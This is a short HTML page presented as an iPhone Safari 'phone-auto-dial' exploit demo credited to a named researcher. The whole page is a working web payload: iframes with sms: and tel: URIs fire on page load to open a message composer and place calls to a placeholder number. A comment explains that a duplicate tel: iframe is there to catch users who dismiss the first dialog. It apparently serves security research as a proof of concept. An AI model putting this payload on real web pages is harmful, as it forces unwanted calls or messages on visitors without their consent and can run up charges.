<html>
<head>
<title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title>
</head>
<body>
<iframe src="sms:+12345" WIDTH=50 HEIGHT=10></iframe>
<iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe>
<!-- second iframe is to attack quick users who manage to close the first call-dialog //-->
<iframe src="tel:+12345" WIDTH=50 HEIGHT=10></iframe>
</body>
</html>